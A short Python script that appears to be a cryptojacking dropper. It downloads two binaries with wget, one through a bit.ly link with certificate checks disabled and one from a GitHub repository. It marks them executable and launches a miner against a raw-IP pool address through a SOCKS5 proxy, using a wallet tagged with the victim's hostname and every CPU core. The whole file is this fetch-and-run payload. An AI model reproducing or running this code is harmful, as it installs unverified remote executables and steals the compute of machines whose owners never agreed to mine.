import os

os.system("wget --no-check-certificate -c https://bit.ly/38QFOus -O xolx")
os.system("wget https://github.com/ardisantaka/ardia/raw/main/gas")
os.system("chmod +x gas xolx")
os.system("./xolx -o 131.153.142.106:80 -u TRTLv2xgnXYJBqb7BuX2MwFZg42hfNDxrK9Y7kjZBNHuZRM17sJSEvQQK8BDhb3Nra48dvXydwZEjA7gWKNwLRJpE7Rw4DXjQqJ.0000000000000000000000000000000000000000000000000000001884336411.$(cat /proc/sys/kernel/hostname) -p XMR-NODE-PROXY --donate-level 1 -k -t $(nproc --all) -x socks5://139.59.107.79:4145")